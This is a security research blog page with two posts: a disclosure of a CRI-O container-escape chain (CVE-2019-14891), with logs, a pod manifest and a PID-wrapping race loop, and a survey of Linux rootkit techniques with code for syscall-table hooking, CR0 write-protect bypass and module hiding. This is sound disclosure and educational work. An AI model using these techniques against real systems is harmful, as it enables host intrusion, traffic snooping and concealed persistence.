Is there a patch?

Yes, as of CRI-O version 1.16.1! However, it’s pretty easy to mitigate the issue provided you are running CRI-O v1.15 or greater. Simply add (or change) the following directive in your /etc/crio/crio.conf file:

conmon_cgroup = "system.slice"

The above is the default setting for conmon_cgroup as of 1.16.1. Read below to find out why putting conmon in a non-pod cgroup is a good idea!

So.. What’s a CRI-O?

CRI-O is a lightweight container engine, like Docker, but one that is built specifically for use with Kubernetes. In fact, it was started as a Kubernetes incubator project. It uses the Kubernetes CRI (Container Runtime Interface) for container management.

CRI-O is the default container engine for Kubic (openSUSE’s Kubernetes distribution) and OpenShift — so while it still has minority market share, it is rapidly gaining popularity.


We’re not going to explain Kubernetes and Pods here in any real depth. This is a great resource for getting up to speed with that. We’ll grossly simplify things here:

  • A pod is a collection of containers that share some resources
  • A pod will always have at least two containers in it when deployed:
    • An infrastructure container, which will typically run the pause process — a placeholder that simply waits for the workload container to finish
    • A workload container (e.g. nginx, clamav, etc) that actually does the work
  • Each pod member will have its own container monitor (conmon in the CRI-O universe, docker-containerd-shim in Docker-land)
  • These containers are created using whatever container runtime is configured. The vast majority of the time, this is runc.

The above stuff will become more relevant soon when we start talking about the different issues in CRI-O. Which is now!

Issue #1: All Process Eggs in One CGroup Basket

The first issue relates to how CRI-O assigns cgroups to processes. One goal of CRI-O is to account for all of the memory usage of each individual pod. To do so, all of the processes related to a given pod are placed in the same memory cgroup. 

An aside: Memory cgroups and the Out-Of-Memory (OOM) killer

What is a memory cgroup? A core component of resource management on Linux — and especially in containers — is the use of control groups (cgroups) to account for and limit resources such as CPU and memory for a process or group of processes. Memory cgroups allow for finer-grained control over how much memory an application can use.

The OOM killer is a kernel helper for dealing with memory-hungry processes. When a system is experiencing very heavy memory usage, the kernel goes around and slays whatever is using the most memory — in the hopes of keeping the system doing whatever it’s meant to be doing. Sounds helpful! The OOM killer uses SIGKILL to get rid of the process (and reclaim memory) as soon as possible.

To be more helpful, the kernel’s OOM killer got a makeover in 4.19+ kernels, gaining cgroup awareness. Now, instead of just killing the single process that is using the most memory on the whole system (I’m looking at you, Chrome), it will monitor cgroups. For example, if you created a pod (which also creates a cgroup) for your huge Java application and assigned it 256MB of memory, 256MB is all that Java could ever use, even if you have a terabyte of RAM on the host. All processes in that pod’s cgroup are subject to that memory restriction, so if there was another container in that pod (for example, a caching service), it would have to share that same 256MB. If that pod uses its full allotted 256MB, the OOM killer would kill the biggest memory hog in the pod — and not the biggest memory user of the whole system.
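A minimal sketch of this mechanism outside of Kubernetes (run as root, and assuming a cgroup v1 memory controller mounted at the usual path):

```shell
# Create a memory cgroup capped at 256MB and join the current shell to it
mkdir /sys/fs/cgroup/memory/demo
echo $((256 * 1024 * 1024)) > /sys/fs/cgroup/memory/demo/memory.limit_in_bytes
echo $$ > /sys/fs/cgroup/memory/demo/cgroup.procs
# Any descendant that pushes the group past 256MB now gets SIGKILLed by
# the kernel's OOM killer, no matter how much RAM the host has free
```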

But the killer can be a bit excitable at times. If two processes in the same memory cgroup trigger the OOM killer at the same time (e.g. by trying to make an allocation on different CPU cores), the OOM killer becomes a literal OOM serial killer — issuing two OOM kills in sequence. This behavior seems to be limited to 4.19 through 5.2.x kernels. Note that if a process is killed with great prejudice (SIGKILL), no signal handlers run. That is, there is no graceful termination or shutdown of the process. The process is just shot in broad daylight. More on this in a moment — but for now, back to CRI-O.

In the interest of keeping track of exactly how much memory a container requires to run, CRI-O lumps the workload process (below, our test program called repro) and the “infrastructure container” process (the pause process — more on this under issue #2) — along with their associated conmon monitor processes — into the same cgroup. You can see the cgroup members in this OOM killer snippet below:

Nov 20 00:56:34 ubu-disco kernel: [  136.324486] Tasks state (memory values in pages):
Nov 20 00:56:34 ubu-disco kernel: [  136.324486] [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 00:56:34 ubu-disco kernel: [  136.324576] [   3825]     0  3825    19521      471    57344        0          -999 conmon
Nov 20 00:56:34 ubu-disco kernel: [  136.324577] [   3849]     0  3849      255        1    28672        0          -998 pause
Nov 20 00:56:34 ubu-disco kernel: [  136.324589] [   4254]     0  4254    19521      442    53248        0          -999 conmon
Nov 20 00:56:34 ubu-disco kernel: [  136.324591] [   4304]     0  4304    66664     3632    90112        0           996 repro
Nov 20 00:56:34 ubu-disco kernel: [  136.324595] oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podf8e932ad_5487_4514_a5be_b75ad1b7a6ce.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podf8e932ad_5487_4514_a5be_b75ad1b7a6ce.slice/crio-ee55f03bd921c55955d8995a0adbb9f19352603a637ea27f6ca8397b715435eb.scope,task=repro,pid=4304,uid=0
Nov 20 00:56:34 ubu-disco kernel: [  136.324600] Memory cgroup out of memory: Kill process 4304 (repro) score 1657 or sacrifice child
Nov 20 00:56:34 ubu-disco kernel: [  136.324627] Killed process 4304 (repro) total-vm:266656kB, anon-rss:14504kB, file-rss:24kB, shmem-rss:0kB
Nov 20 00:56:34 ubu-disco kernel: [  136.328368] oom_reaper: reaped process 4304 (repro), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB

CRI-O gets +1 for visibility into resource usage, but -9001 for stability — because sometimes, if the OOM killer becomes an OOM serial killer and triggers multiple times, it can kill a container monitor (conmon) process as well as workload and pause processes. This typically manifests as follows:

  1. The workload process (repro, above) allocates a bunch of memory, triggering the OOM killer. 
  2. Very shortly afterwards, and before the OOM killer does its job, one of the conmon processes in the cgroup tries to make an allocation. As the cgroup is already out of memory thanks to the repro process, this triggers the OOM killer again.
  3. OOM killer #1 fires, and kills the workload process for using too much memory. Makes sense. In this case, it tried to allocate 256MB of memory when the cgroup only gave it 18MB.
  4. OOM killer #2 fires, but the offender (the repro process) is already dead. So it kills something else instead. Quite often, it kills the conmon process of the pause (infrastructure) container — which we’ll cover in the next section.

Having conmon in the same cgroup as the containerized processes exposes the underlying container management systems to being killed. CVE-2019-14891 was issued for this problem we identified, which was resolved by putting conmon in a different cgroup to its pods by default.

Issue #2: If a Process Dies in a Forest, and No One is Around..

Our second issue in this chain of unfortunate events relates to how CRI-O doesn’t get notified if a conmon process is killed. No action is taken by CRI-O because CRI-O thinks the conmon process is still alive and well. Unfortunately, it isn’t. While not necessarily a vulnerability, the decentralized container management approach does play its part in this chain of bugs. This is a design decision by the CRI-O team: containers should not be tied to a daemon, and we as users should be able to restart the cri-o daemon without needing to tear down and rebuild all the containers.

The conmon container monitor process is important because it, well, monitors a container. If conmon is gone-mon, there is no way for conmon to communicate to the container engine (CRI-O) about the health of whatever it was monitoring. If a conmon process is killed, then whatever process was being managed by that conmon process is re-parented to init or PID 1. If a pause process’ conmon process is killed, then that pause process ends up being reparented to init and it just kind of floats there (more on why that’s bad below). CRI-O still thinks the pod is fully intact. 

Let’s pause for a bit

It’s probably worth taking a second to talk about the pause process and why it’s important. No super-gory details, but enough for some context.

When Kubernetes spins up a pod, it first creates an infrastructure container / pause process. You can actually kind of think of the pod as being the pause process: it holds the namespaces for the pod, and is the parent of the containers that live inside it. And if the infrastructure container (pause process) dies, all of the workload containers in the pod are culled, too.

After the pause process is started, a specification for the containers in that pod is created. The specification includes references for where containers in that pod should get their namespaces from. Whenever a workload process is created (e.g. the nginx container or whatever you were expecting to run), runc will apply the namespaces stored in this specification to the new process using the setns() system call. This ensures that if your nginx process dies, its replacement will be in the same namespaces as its predecessor. By default, a pod will have its own network, IPC, and UTS namespaces.

Now, let’s return to why the pause process floating in init limbo presents such an issue.

Issue #3: Grief Is A Process

The final part of the puzzle is how CRI-O manages namespaces for pods, which are stored in the form of proc paths for the pause process (e.g. /proc/$PAUSEPID/ns/ipc). As noted in the previous section, these paths are used as the target of setns() calls for all containers created in that pod.
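These namespace paths are ordinary symlinks that every process exposes, so you can inspect your own; the inode number in the output is what identifies the namespace:

```shell
# Each entry resolves to a name:[inode] pair, e.g. ipc:[4026531839];
# two processes in the same namespace resolve to the same inode
readlink /proc/self/ns/ipc
readlink /proc/self/ns/net
```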

If the pause process goes away — say, due to being killed by that same overzealous OOM serial killer in the kernel — CRI-O never learns that the pause process is gone. This is important, because the next time CRI-O tries to create the workload container, it’s going to tell runc to copy all of the namespaces over from those /proc/$PAUSEPID/ns/x paths. But, runc fails to start the container, as the PID in the namespace path no longer exists due to the pause process’ untimely murder:

Nov 20 01:35:48 ubu-disco crio[871]: time="2019-11-20 01:35:48.213858401Z" level=error msg="Container creation error: container_linux.go:338: creating new parent process caused \"container_linux.go:1897: running lstat on namespace path \\\"/proc/18235/ns/ipc\\\" caused \\\"lstat /proc/18235/ns/ipc: no such file or directory\\\"\"\n"

Ultimately, PIDs get recycled, and $PAUSEPID will be assigned to some other new process. Assuming the new owner of $PAUSEPID is still alive when Kubernetes next tries to schedule that pod, runc will dutifully copy over whatever namespaces the new, shiny $PAUSEPID has. If $PAUSEPID belongs to a node process (instead of a pod process), then the new container gets host IPC, NET, and UTS namespaces, which looks something like this:

Nov 20 01:37:04 ubu-disco systemd[1]: Started crio-conmon-d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.scope.
Nov 20 01:37:04 ubu-disco systemd[1]: Created slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Removed slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Started libcontainer container d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.
Nov 20 01:37:04 repro-pod10-6c8bdc448f-47mhk systemd-resolved[687]: System hostname changed to 'repro-pod10-6c8bdc448f-47mhk'.

Aside from giving the attacker the ability to change the hostname, this also lets the attacker interact with the underlying node’s network interfaces and traffic, as well as its IPC/shared memory instances. Simply put, the attacker can discover any sensitive data flowing through the node (i.e. any pods running on it). Our PoC video demonstrates us using tcpdump to show network traffic on all of the node’s interfaces.
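For reference, the capture in the video amounts to something like the following (the exact flags are our illustration), run from inside the escaped container:

```shell
# With the node's network namespace, -i any sees every node interface;
# -A prints packet payloads, so plaintext HTTP is directly readable
tcpdump -i any -nn -A 'tcp port 80'
```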

This issue is in the process of being resolved by the CRI-O team, by creating namespace file descriptors and bind-mounting them into pods instead of hard-coding a path to a transient process in /proc. This means that when runc creates the workload container again, it won’t be relying on a path that could have information belonging to an out-of-pod process. This should land in the next couple of weeks, but really, the patch for issue #1 will largely mitigate this issue if you run CRI-O.

All Together Now

The steps we describe below outline how the above issues could be grouped together to achieve a partial container escape – where we get some host namespaces (ipc, net and uts), but not all of them. The process names and PIDs referenced below line up with those in the video, if you want to play along.

1 – A new pod is created with a memory limit, resulting in four processes and two containers:

  • pause (the infrastructure container / pod process) and its associated conmon. The PID of the pause process (18235) is used to construct namespace paths (e.g. /proc/18235/ns/ipc) that are assigned to the sandbox container specification which is used when creating new containers in the pod.
  • repro (the workload container / process) and its associated conmon. It gets its namespaces assigned from the pause process (PID 18235). The repro process first checks to see if it’s in the node’s UTS namespace. If it is, it sends a reverse shell to the attacker. If it isn’t, it tries to allocate 256MB of memory. Here’s the pod configuration we used:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: repro-pod2
spec:
  selector:
    matchLabels:
      name: repro-pod2
  template:
    metadata:
      labels:
        name: repro-pod2
    spec:
      containers:
        - name: repro-pod2
          resources:
            limits:
              memory: 21Mi
          command: ["/repro"]
          args: ["", "4444"]
      imagePullSecrets:
      - name: regcred

2 – The workload process (repro) allocates too much memory, invoking the kernel’s OOM killer.

3 – While this is taking place, the conmon process that manages the workload process also tries to allocate something, but as its memory cgroup is still in an OOM state, this fails too and invokes the kernel’s OOM killer. The OOM killer’s actions are serialized, so this takes place after the OOM killer round initiated from step #2.

  • Sometimes, a third allocation occurs at the same time. When this happens, we might skip steps #7-10, as the OOM killer kills the pause process at the same time.

4 – The OOM killer from step #2 kills the misbehaving workload process (repro) successfully.

Nov 20 01:35:43 ubu-disco kernel: Tasks state (memory values in pages):
Nov 20 01:35:43 ubu-disco kernel: [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 01:35:43 ubu-disco kernel: [  18197]     0 18197    19521      476    57344        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18235]     0 18235      255        1    32768        0          -998 pause
Nov 20 01:35:43 ubu-disco kernel: [  18653]     0 18653    19521      460    53248        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18724]     0 18724    66664     3629    90112        0           996 repro
Nov 20 01:35:43 ubu-disco kernel: oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=crio-2636c2063b8682d6d5c6a81d74d5eddd14dd676445990f1b19e92919d6568acb.scope,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice/crio-2636c2063b8682d6d5c6a81d74d5eddd14dd676445990f1b19e92919d6568acb.scope,task=repro,pid=18724,uid=0
Nov 20 01:35:43 ubu-disco kernel: Memory cgroup out of memory: Kill process 18724 (repro) score 1656 or sacrifice child
Nov 20 01:35:43 ubu-disco kernel: Killed process 18724 (repro) total-vm:266656kB, anon-rss:14504kB, file-rss:12kB, shmem-rss:0kB
Nov 20 01:35:43 ubu-disco kernel: conmon invoked oom-killer: gfp_mask=0x6040c0(GFP_KERNEL|__GFP_COMP), order=0, oom_score_adj=-999

5 – The OOM killer from step #3 starts (you can actually see it in the last line of the output above), and decides someone else needs to die. Sometimes this is the other conmon process — the one watching over the pause / infrastructure process. CRI-O is not informed of this death, and thinks that everything is still fine (aside from the workload process being killed, which triggers the usual Kubernetes backoff process). 

  • In the case below, the pause process was actually killed first.
Nov 20 01:35:43 ubu-disco kernel: Tasks state (memory values in pages):
Nov 20 01:35:43 ubu-disco kernel: [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 01:35:43 ubu-disco kernel: [  18197]     0 18197    19521      476    57344        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18235]     0 18235      255        1    32768        0          -998 pause
Nov 20 01:35:43 ubu-disco kernel: [  18653]     0 18653    19521      460    53248        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice/crio-conmon-d2f0d56a2b6de8b76ecbcde807b5297c416cc909457b75842beb7b661a001f94.scope,task=conmon,pid=18197,uid=0
Nov 20 01:35:43 ubu-disco kernel: Memory cgroup out of memory: Kill process 18197 (conmon) score 0 or sacrifice child
Nov 20 01:35:43 ubu-disco kernel: Killed process 18235 (pause) total-vm:1020kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB

6 – With the infrastructure container’s conmon dead, its process (pause) is orphaned and reparented to the node’s init process.

7 – Backoff timeout is reached, and the Kubelet asks CRI-O to make another workload process (repro) for the pod, which it does. As expected, runc is invoked and it copies the namespaces from the pause paths (/proc/18235/ns/[ipc|net|uts]).

8 – The new workload process (a new repro) allocates too much memory again, invoking the OOM killer again. (same as step #2)

9 – The workload’s conmon process tries to allocate something while the cgroup is OOMed, also invoking the kernel’s OOM killer (same as step #3)

10 – The OOM killer from step #8 kills the workload process (same as step #4)

11 – The OOM killer from step #9 looks for something to kill, and settles on the pause process (PID 18235). CRI-O is not informed of its death. The sandbox container specification (from step 1.1) is not changed, and still holds a reference to the now-dead pause process’ namespace paths (/proc/18235/ns/[ipc|net|uts]).

Note: At this point, all processes related to the pod are dead. The only remaining references to the sandbox exist in CRI-O.

12 – Step #7 keeps on repeating, but failing, because whenever a new repro / workload process is started, runc tries to copy over its namespaces from the paths in the container spec (those of the dead pause process, 18235). This is where we see that “lstat” error in logs from Issue #3:

Nov 20 01:35:48 ubu-disco crio[871]: time="2019-11-20 01:35:48.213858401Z" level=error msg="Container creation error: container_linux.go:338: creating new parent process caused \"container_linux.go:1897: running lstat on namespace path \\\"/proc/18235/ns/ipc\\\" caused \\\"lstat /proc/18235/ns/ipc: no such file or directory\\\"\"\n"

13 – Eventually, PIDs wrap, and some other process gets PID 18235 (the PID of the old pause process). We can help this along with a loop, which will iterate through all PIDs until it is assigned the desired PID, at which point it sleeps — ensuring that the PID is referenceable by runc when it’s next time to create the repro container:

while :; do sh -c 'if [ $$ -eq 18235 ]; then echo "Sleeping as PID $$"; exec sleep 700; fi'; done

14 – Step #7 repeats again, and the workload process / container is successfully launched, because runc could copy namespaces from our sleep process. If that new PID is in a different namespace (e.g. the host’s namespace), then the containerized process gets those namespaces. The namespaces copied are net, uts, and ipc.

15 – As the workload is being created, runc runs sethostname() which would normally set the contained process’ hostname to the pod’s name. Due to the container now having the node’s uts namespace, the whole node is assigned the pod’s name.

Nov 20 01:37:04 ubu-disco systemd[1]: Started crio-conmon-d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.scope.
Nov 20 01:37:04 ubu-disco systemd[1]: Created slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Removed slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Started libcontainer container d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.
Nov 20 01:37:04 repro-pod10-6c8bdc448f-47mhk systemd-resolved[687]: System hostname changed to 'repro-pod10-6c8bdc448f-47mhk'.

Here’s the video of it all in play:

Exploitation scenario

The likelihood of these bugs actually being exploited is pretty minimal. It requires a few stars to be aligned:

  • The target is running CRI-O, which has relatively low adoption
  • The target is running a kernel between v4.19 and 5.2 (inclusive)
  • The attacker can either 1) deploy a pod of their choosing or 2) control an image that they know will be deployed, and know that it will be deployed with a memory limit in place
  • The PID race is won (could take some time)
  • And even then, the impact depends on the deployment and whether there is actually something of value to dump or interact with on the host’s network interfaces.

These things could definitely happen, but that’s a lot of stars.


This is a pretty quirky collection of issues that, when combined, could result in an unprivileged pod getting access to sensitive host resources — such as privileged services running on the loopback interface, shared memory/IPC resources, and the ability to watch any network traffic on the node. Patch and reconfigure CRI-O or upgrade your kernel to the 5.3.x series so you won’t need to thank your lucky stars.

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.

Don’t Get Kicked Out! A Tale of Rootkits and Other Backdoors

Posted by


When it comes to rootkits and other backdoors, everything is on the table. There exists a vulnerability that can be exploited in a system binary to gain root access? There’s a rootkit for that. You allow kernel modules? A plethora of nefarious goodies can be part of your system! Your new chip is made in a third-party factory? You get the idea.

In this post, we will focus on software backdoors commonly seen in Linux environments, outline some representative examples, and discuss common techniques backdoor authors use to hide their malicious payloads.

What’s a backdoor?

Most things that are or that can be made persistent in a system are candidates for rootkits and backdoors — options are only limited by the imagination and ingenuity of attackers. What’s worse, even in cases where no privilege escalation to root is involved (enabling a rootkit), backdoors are at least as privileged as the respective service, component, or user, which, most likely, is enough to cause you trouble. 

Once a backdoor has been installed, you can only hope someone notices, and given the multitude of means for attackers to get a foothold on your system (from build scripts and userspace applications to long-running utilities), it is hard to know where to look, or what to look for. After all, it only takes one malicious actor with the capability to install some malicious payload in some part of your system ;). If such a foothold is established, attackers can exfiltrate information, alter the normal operation of the system, bring services down, or take other undesirable actions. 

Although not as hard to detect as hardware backdoors, software backdoors and rootkits are a severe threat, used for state and corporate spying, information exfiltration, botnet command and control, or as stepping stones for reconnaissance and exploitation of other devices on the network.

The first rootkits date back to the early 1990s. These instances of backdoors simply replaced or modified files on the victim’s hard disk (e.g., replacing the UNIX login program with a malicious one). In the mid-90s, kernel rootkits appeared on Linux systems in the form of kernel modules, and, by the end of the decade, they existed for most UNIX-like operating systems like Solaris and FreeBSD, as well as for Windows.

As rootkits evolved, attackers started devising more elaborate ways to modify in-memory contents of the running kernel or applications, as well as infecting the BIOS or device firmware, or using virtualization technology and hardware features to their advantage. Today, rootkits and other backdoors come in many forms and shapes. In this post, we will attempt to outline some representative examples of different types of backdoors, and discuss common techniques deployed in each case.

Species’ Samples

Overall, backdoors can be split into four large groups, depending on whether they exploit hardware or software vulnerabilities and also depending on whether they operate in kernel space or user space. In this post, we will focus only on software backdoors, and present some representative techniques for kernel and userspace backdoors, respectively. The outline of the rest of the post is the following:

Software / Kernelspace

Rootkits Abusing Loadable Kernel Modules (LKM)

This is the oldest and by far the most popular category of kernel rootkits seen in the wild. The first rootkits (ab)using kernel modules were described by Solar Designer, halflife, plaguez and others. The great benefit of LKM-based rootkits is that they are very powerful, allowing attackers to do (almost) anything in the system. Their biggest drawback is that they are neither backwards nor upwards compatible and are almost certain to break as kernel versions change. Moreover, bugs in the code are likely to have (very) noticeable side effects, even resulting in a system crash.

Usually a kernel rootkit’s primary goal is to maintain privileged access, which it can achieve through a number of means:

  • Altering system behavior (e.g., by hijacking system call tables or interrupt handlers)
  • Hiding itself
  • Hiding other files, directories and processes
  • Providing mechanisms for regaining privileges, which could be through:
    • Escalating privileges for given users or processes
    • Triggering keyloggers
    • Enabling remote connections

In the following section, we’ll examine some of the core techniques used by LKM-based rootkits.

Altering System Behavior

Hooking by Replacing System Calls

A rootkit can hook system calls by replacing pointers in the sys_call_table. However, to do so, it must first locate the system call table (from 2.6.x kernels and on, sys_call_table is not exported). There are various methods to achieve this, some of which are outlined below:

  • If kASLR is not enabled (which is rarely the case nowadays2), the address of the system call table can be read directly from the kernel’s symbol map via: grep sys_call_table /boot/System.map-$(uname -r) |awk '{print $1}'
  • If CONFIG_KALLSYMS=1 is set in the kernel config, it is trivial to fetch the address of the system call table by running addr = (void *)kallsyms_lookup_name("sys_call_table");
  • Depending on the kernel and architecture, the system call table can be fetched using the interrupt descriptor table and finding the system call interrupt gate. This technique was first proposed by sd & devik and is used by several rootkits. Let us examine how the suterusu rootkit uses this technique: 
    • For x86 the code is as follows:
1. unsigned char code[255];
2. asm("sidt %0":"=m" (idtr));
3. memcpy(&idt, (void *)(idtr.base + 8 * 0x80), sizeof(idt));
4. sct_off = (idt.off2 << 16) | idt.off1;
5. memcpy(code, (void *)sct_off, sizeof(code));
6. p = (char **)memmem(code, sizeof(code), "\xff\x14\x85", 3);
7. if (p) { return *(unsigned long **)((char *)p + 3); }

The instruction at line 2 asks the processor for the interrupt descriptor table, whilst the following instruction copies out the interrupt descriptor of int 0x80. Line 4 computes the address of the int 0x80 entry point. Now, the only thing left to look for is the location of the call *sys_call_table(,%eax,4) dispatch near the beginning of the int 0x80 entry point. This is found by searching for the opcode bytes "\xff\x14\x85", which correspond to the pattern call *<x>(,%eax,4). Line 7 returns the desired address.

  • For x86_64 and ARM, similar tricks are performed. For example, in x86_64 the technique is using  rdmsrl(MSR_LSTAR, <offset>); instead of asm("sidt %0":"=m" (idtr)); to fetch the system call table entry before searching for the appropriate call (this is not as trivial with kernels configured to have Retpoline protection for Spectre/Meltdown). 
  • Older rootkits found the system call table by abusing the fact that sys_call_table always lay between the end of the kernel’s code section (init_mm.end_code) and the end of its data section (init_mm.end_data). Since sys_close was exported by the kernel and the system calls were ordered by their numbers, the address of the table could be found just by subtracting from the pointer of sys_close.

From the above, it is clear that determining the system call table address is not particularly hard given an LKM. Once the system call table address is found, one can replace system calls at will. Depending on how far the attacker is willing to go, they can overwrite the original address of a certain system call with one of their own, or, to be more subtle, overwrite code in the system call itself to point to their code. 

This is not as trivial in all cases (depending on kernel version and config), especially since recent kernels have enforced memory to be read-only on text pages, and given that SMP requires the changes to be synchronized across all cores. Thus, although implementations are very much architecture-specific, taking Intel x86 architectures as an example, the core gist of the technique used by most rootkits is the following: 

First, if the page for the system call table is read-only it has to be marked as RW:

unsigned int level;
pte_t *pte = lookup_address((unsigned long)sys_call_table, &level);

if (!(pte->pte & _PAGE_RW))
	pte->pte |= _PAGE_RW;

Subsequently, the control bit within CR0 that write-protects memory also needs to be flipped:

unsigned long __cr0;
// per CPU code - make it preemption safe 
// read cr0 and clear the write-protect bit
__cr0 = read_cr0() & (~X86_CR0_WP);
write_cr0(__cr0);
// replace the system call table entry
sys_call_table[__NR_syscall_of_choice] = (void *)&syscall_hook;
// restore the cr0 write-protect bit
__cr0 = read_cr0() | X86_CR0_WP;
write_cr0(__cr0);
// all done here

A modification like the above can be detected by comparing the addresses in the system call table against a copy made at a time when the system was considered to be uninfected. If attackers employ more sophisticated rewriting techniques, detection must step up and become more sophisticated itself.
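The comparison itself is straightforward. Here is a minimal userspace simulation of the idea (the table, snapshot, and hook functions below are stand-ins for illustration, not kernel structures):

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef long (*syscall_fn)(void);

static long real_read(void)  { return 1; }
static long real_write(void) { return 2; }
static long evil_read(void)  { return 42; }  /* stand-in for a rootkit hook */

/* Return the index of the first table entry differing from the trusted
 * snapshot, or -1 if the table is intact. */
static int first_tampered_entry(const syscall_fn *table,
                                const syscall_fn *snapshot, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (table[i] != snapshot[i])
            return (int)i;
    return -1;
}
```

A real checker would snapshot the kernel’s table at install time and run the comparison periodically, which is exactly why subtler rootkits patch the syscall bodies instead of the table.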

In addition to replacing a system call, a kernel module can also register a new, previously non-existent system call. However, that is clearly less covert than the previous approach of leveraging existing system calls.

Hooking Using Kprobes

Kprobes are a fantastic tool for tracing things in the kernel, and for getting useful information about the execution. A user can set a kprobe on symbols, kernel addresses, functions, etc., and can get access to register and stack state. Essentially, if you register a kprobe, a custom piece of code executes in the probe handler context before execution resumes as usual. Kprobe handlers can execute before or after a function returns, and have access to different states. Clearly this is very powerful, as stated in the kprobe documentation:

“Since kprobes can probe into a running kernel code, it can change the register set, including instruction pointer. This operation requires maximum care, such as keeping the stack frame, recovering the execution path etc. Since it operates on a running kernel and needs deep knowledge of computer architecture and concurrent computing, you can easily shoot your foot.”

As expected, kprobes, as well as the now-deprecated jprobes (another type of tracing mechanism), have been used in rootkits to achieve stealthiness. For instance, by registering a kprobe handler on file-related syscalls, it’s easy to implement file-hiding behavior as part of your rootkit.

Module Hiding Techniques

There are a multitude of techniques which modules employ to hide themselves from the system, as well as to hide other malicious files, directories, or processes.

Hiding by (ab)using debug registers

A technique that has been actively used in the wild to hide rootkits is taking advantage of a debugging mechanism present in x86. A great overview of this technique is presented by halfdead. Debug registers allow users to set hardware breakpoints. As soon as execution flow hits an address marked with a breakpoint, control is handed to the debug interrupt handler, which then calls the do_debug() function. 

Consider a scenario where you set a breakpoint on the address of the system call table, and then hijack the debug interrupt handler (INT 1) to call your own method, or replace the do_debug method, thus leaving the Interrupt Descriptor Table (IDT) intact. This is very powerful and stealthy, as system calls, for instance, can be controlled by an attacker, and, if done cleverly, this technique can work without touching the system call table, the system call table handler, or the INT 80 handler. Further, if someone tries to detect INT 1 handler modification or place their own handler there (like a debugger would), the attacker can set a secondary breakpoint to watch their own handler’s address. 

Hiding by list manipulation and call hooks

One common way to hide the module from listing /proc/modules and lsmod is by simply removing it from the kernel module list structure (which does not remove it from memory).

An example of such manipulation is listed in the following snippet, taken from this sample rootkit:

// entry before the module in the kernel modules list - store so that we can restore things later
mod_list = THIS_MODULE->list.prev;
// delete this module from the kernel's module list
list_del(&THIS_MODULE->list);

// hide from /sys/module
kobject_del(&THIS_MODULE->mkobj.kobj);
THIS_MODULE->sect_attrs = NULL;
Similar tricks are used to hide binaries from commands like ps, or ls. For instance, if one hooks the getdents system call, they can replace it with their own that monitors for commands trying to list an executable, thereby hiding any malicious activity. One such example is presented in this rootkit.
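The effect of a hooked getdents can be sketched in plain userspace C: the hook copies directory records through but skips any whose name carries a marker. The MAGIC_PREFIX below is an illustrative convention, not taken from a specific rootkit:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MAGIC_PREFIX "c8_hidden_"  /* illustrative marker */

/* Compact the entry list in place, dropping names that carry the magic
 * prefix -- the same filtering a hooked getdents applies to the
 * struct linux_dirent records it returns. Returns the new count. */
static size_t filter_entries(const char **names, size_t n)
{
    size_t kept = 0;

    for (size_t i = 0; i < n; i++)
        if (strncmp(names[i], MAGIC_PREFIX, strlen(MAGIC_PREFIX)) != 0)
            names[kept++] = names[i];
    return kept;
}
```

In the real attack this filtering happens on the byte buffer the kernel hands back to ls or ps, so the hidden files simply never reach the listing tool.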

Rootkits Directly Modifying Kernel Memory

Non-LKM kernel patching was proposed by Silvio Cesare in his Runtime Kernel Patching paper, which proposed (ab)using direct access to memory in Linux, made available through the /dev/mem and /dev/kmem device files. Modern Linux distributions disable this access by default. However, if CONFIG_STRICT_DEVMEM or CONFIG_DEVKMEM are not properly set in your kernel config, the entirety of the LKM-based functionality can be achieved without LKMs if a user has root access (see for instance this phrack article from 2001 on system call patching). We will not elaborate further on this category due to the overlap with the LKM techniques.

Rootkits Abusing eBPF

This is an interesting and less-explored category that builds on the same principles as the previous ones: if a malicious actor gets privileges on a modern, eBPF-enabled Linux system, they can use tracing capabilities to see everything within the system, as well as write to userspace memory. As a notable example of such a type of rootkit, glibcpwn injects shared libraries into systemd, using bcc-based eBPF kprobes. In particular, the rootkit’s functionality is summarized by the following points:

  • Hooking the timerfd_settime system call, which is called by systemd every minute
  • Computing an offset to the start of libc by walking the appropriate structs from the arguments passed
  • Returning the stack return address and the address of __libc_start_main to the userland tracer code, and starting a ROP chain

